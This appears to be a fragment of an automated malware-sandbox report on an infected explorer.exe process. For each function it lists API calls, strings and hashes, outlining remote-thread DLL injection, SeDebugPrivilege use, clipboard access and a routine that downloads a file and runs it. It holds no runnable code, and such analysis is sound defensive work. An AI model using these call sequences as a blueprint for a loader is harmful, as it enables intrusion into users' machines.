                                                                                                                                                                                                                                                    • Opcode ID: a2b6eebe7ce721567b47b20f839de2ace9a9a7d6de31a862e75d2fae5371e3ee
                                                                                                                                                                                                                                                    • Instruction ID: e091c3e0b23cd997c6cdbe635b87914d3018c163ad2a71b3b117207df10cc346
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2b6eebe7ce721567b47b20f839de2ace9a9a7d6de31a862e75d2fae5371e3ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1C13972704B998AEB60DF26E8543DA73A1F78EB98F400125DE4A47B68DF3CD549CB01
                                                                                                                                                                                                                                                    Function 0E8A0E40 Relevance: 25.8, APIs: 5, Strings: 12, Instructions: 267COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.LIBCMT ref: 0E8A0EC8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _FF_MSGBANNER.LIBCMT ref: 0E8BB6BC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _NMSG_WRITE.LIBCMT ref: 0E8BB6C6
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _callnewh.LIBCMT ref: 0E8BB6FA
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _errno.LIBCMT ref: 0E8BB705
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB68C: _errno.LIBCMT ref: 0E8BB710
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E8A1270
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E8A1278
                                                                                                                                                                                                                                                      • Part of subcall function 0E8BB64C: _errno.LIBCMT ref: 0E8BB66C
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E8A1280
                                                                                                                                                                                                                                                    • free.LIBCMT ref: 0E8A1289
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                                                    • String ID: ExistsA$HttpQueryInfoA$HttpQueryInfoW$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$ageA$eThread$leA$rectoryA$sId$sktopA$topA
                                                                                                                                                                                                                                                    • API String ID: 2761444284-3842439839
                                                                                                                                                                                                                                                    • Opcode ID: 5a4c3ce5e95685d34890296d4a14d3adbdffde3fe6031991bc3d66c464cb213a
                                                                                                                                                                                                                                                    • Instruction ID: 372548c6e37beed78d5112837111b91315a2d214c814bf1246afdd300d31ede1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a4c3ce5e95685d34890296d4a14d3adbdffde3fe6031991bc3d66c464cb213a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5C19D72204B8586FB10CF26E8543AA73A1F78AB88F544925DE4EA7B58DF3CD549CB10
                                                                                                                                                                                                                                                    Function 10D63320 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 93injectionlibrarymemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                                                                    • String ID: @$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 752146563-1829755052
                                                                                                                                                                                                                                                    • Opcode ID: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction ID: 4d774ac79c9ba68f664d99d40973c0f1fb4cf7da25e4688ad16f233a36a51d39
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34316D32305B5187EA149F96B85479AA3A4FB89FD5F588026EE8E43B64DF7CC4868700
                                                                                                                                                                                                                                                    Function 0F4A3320 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 93injectionlibrarymemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                                                                    • String ID: @$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 752146563-1829755052
                                                                                                                                                                                                                                                    • Opcode ID: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction ID: 3f542fc7ab6914e89527adafe0b3580def8fa140626270e67fa2c2bbc3f98e17
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5319021606B5182EB609F16B81037B63A2BB89FD4F845036DE4E47F25EF3EC54A8B50
                                                                                                                                                                                                                                                    Function 0E8F3320 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 93injectionlibrarymemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                                                                    • String ID: @$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 752146563-1829755052
                                                                                                                                                                                                                                                    • Opcode ID: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction ID: 03ff584ec6c34c449e77f96927adb37c09f05981ed2cd665fc5960a653cb3646
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b046ed1697678a022d51bd2b97e14f8d7cd483dfe2596ecbffb1871ce12f6d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC316A61305B9686EF10DB16F81472AA3A0FB99FC4F984429DE4E53B64EF3CC50A8B00
                                                                                                                                                                                                                                                    Function 10D747E0 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74882
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET ref: 10D74897
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcpyA.KERNEL32 ref: 10D6675E
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D6676F
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66783
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66797
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667A8
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667BC
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D667DA
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: wsprintfA.USER32 ref: 10D667F2
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66806
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D6681A
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrcatA.KERNEL32 ref: 10D66856
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: WSAStartup.WS2_32 ref: 10D66866
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: socket.WS2_32 ref: 10D66882
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: gethostbyname.WS2_32 ref: 10D66899
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: memcpy.MSVCRT ref: 10D668B9
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: htons.WS2_32 ref: 10D668C8
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: connect.WS2_32 ref: 10D668DF
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: lstrlenA.KERNEL32 ref: 10D668F5
                                                                                                                                                                                                                                                      • Part of subcall function 10D66700: send.WS2_32 ref: 10D6690B
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 10D74911
                                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32 ref: 10D7492F
                                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32 ref: 10D74945
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D74955
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 10D74961
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32 ref: 10D7498A
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32 ref: 10D749AF
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 10D749BE
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 10D749C7
                                                                                                                                                                                                                                                    • ShellExecuteA.SHELL32 ref: 10D749F5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 10D74A04
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 10D74A0F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3619236930-0
                                                                                                                                                                                                                                                    • Opcode ID: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction ID: e7735b6e2cb499269d5a4bd9d2df76d165257e6279828fc8786a226dababbd08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0514A32714A419AEB11DFA6F8543DE77A0F789B8CF448025DE8947B68DF78C585CB10
                                                                                                                                                                                                                                                    Function 0F4B47E0 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4882
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET ref: 0F4B4897
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcpyA.KERNEL32 ref: 0F4A675E
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A676F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6783
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6797
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67A8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67BC
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A67DA
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: wsprintfA.USER32 ref: 0F4A67F2
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6806
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A681A
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrcatA.KERNEL32 ref: 0F4A6856
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: WSAStartup.WS2_32 ref: 0F4A6866
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: socket.WS2_32 ref: 0F4A6882
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: gethostbyname.WS2_32 ref: 0F4A6899
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: memcpy.MSVCRT ref: 0F4A68B9
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: htons.WS2_32 ref: 0F4A68C8
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: connect.WS2_32 ref: 0F4A68DF
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: lstrlenA.KERNEL32 ref: 0F4A68F5
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A6700: send.WS2_32 ref: 0F4A690B
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 0F4B4911
                                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32 ref: 0F4B492F
                                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32 ref: 0F4B4945
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4B4955
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0F4B4961
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32 ref: 0F4B498A
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32 ref: 0F4B49AF
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0F4B49BE
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0F4B49C7
                                                                                                                                                                                                                                                    • ShellExecuteA.SHELL32 ref: 0F4B49F5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0F4B4A04
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0F4B4A0F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3619236930-0
                                                                                                                                                                                                                                                    • Opcode ID: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction ID: 5b3b732686cca8be735235a8aff23f045dca2c5697d5e89f6a3a9cbbb5912c62
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79515132714A419AEB20DF66E8543EE77A4F788798F44402ADE4A47F6ADF7CC149CB10
                                                                                                                                                                                                                                                    Function 10D63490 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 10D634E6
                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32 ref: 10D634F9
                                                                                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32 ref: 10D6351D
                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 10D63540
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 10D6354B
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32 ref: 10D6355B
                                                                                                                                                                                                                                                      • Part of subcall function 10D63290: OpenProcess.KERNEL32 ref: 10D632B9
                                                                                                                                                                                                                                                      • Part of subcall function 10D63290: CloseHandle.KERNEL32 ref: 10D632E1
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 10D63598
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2357999848-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction ID: 172378953b134310e052101dc928cd5a6794a0b94a6505642c8e6a7fc21ae7eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7531D131325B4183EB10CF66B85475AB7A1FBC9BD4F54D026EE8A53B54EE38C4468700
                                                                                                                                                                                                                                                    Function 0F4A3490 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0F4A34E6
                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32 ref: 0F4A34F9
                                                                                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32 ref: 0F4A351D
                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0F4A3540
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0F4A354B
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32 ref: 0F4A355B
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A3290: OpenProcess.KERNEL32 ref: 0F4A32B9
                                                                                                                                                                                                                                                      • Part of subcall function 0F4A3290: CloseHandle.KERNEL32 ref: 0F4A32E1
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0F4A3598
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2357999848-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction ID: e5196fc448e1ff496755299fd0301d4f65b81767053af3749562bd83534deed1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD31B521316B4142EB608F27B95477BB7A2FB88B94F405025AE4A47F15FF3EC04A9740
                                                                                                                                                                                                                                                    Function 0E8F3490 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0E8F34E6
                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32 ref: 0E8F34F9
                                                                                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32 ref: 0E8F351D
                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0E8F3540
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0E8F354B
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32 ref: 0E8F355B
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F3290: OpenProcess.KERNEL32 ref: 0E8F32B9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F3290: CloseHandle.KERNEL32 ref: 0E8F32E1
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0E8F3598
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2357999848-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction ID: fa5e2be95b588652baac480ccde479d6370ecc1cc7565526982a98dfe8d4fea7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9065b95d661f5d853646ac80bceb72d765eda762b173d403d7b779b3056fa07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931B461325B8682EB10CF66F95471AB7A1FBC9B95F405429EF4EA3B54EE3CC4468700
                                                                                                                                                                                                                                                    Function 10D78580 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1677084743-0
                                                                                                                                                                                                                                                    • Opcode ID: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction ID: fcfd1269098506c2f4241c4555005d48710157036d5c6e05b85714aa5893a591
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2012835304B81CAEA149FA2F81839E6761FB89FC5F588025EF8A17B59CF7CD4858744
                                                                                                                                                                                                                                                    Function 0F4B8580 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1677084743-0
                                                                                                                                                                                                                                                    • Opcode ID: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction ID: 571e92cb6ad6087ec30451e9f33c6331e76a45a9519e8cf69e0d802bd1c7521f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B018F31209B428AEB24AF62F8183AEA322F788FC4F884035DE5A07B59DF7DC4558740
                                                                                                                                                                                                                                                    Function 0E908580 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1677084743-0
                                                                                                                                                                                                                                                    • Opcode ID: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction ID: d08934b3501991f910aa4e0dd455415752a73c98dc0571e7bc0e60cc7e17b6a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 837739eecf333f6045c5df9b411b3d2061407bff472ce5d3b9545f2efae08f35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE012825205A86CBEA04AB62F81835E6361FB88FC4F484935DE4A57B59DF3DC5858740
                                                                                                                                                                                                                                                    Function 10D64420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77injectionmemorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
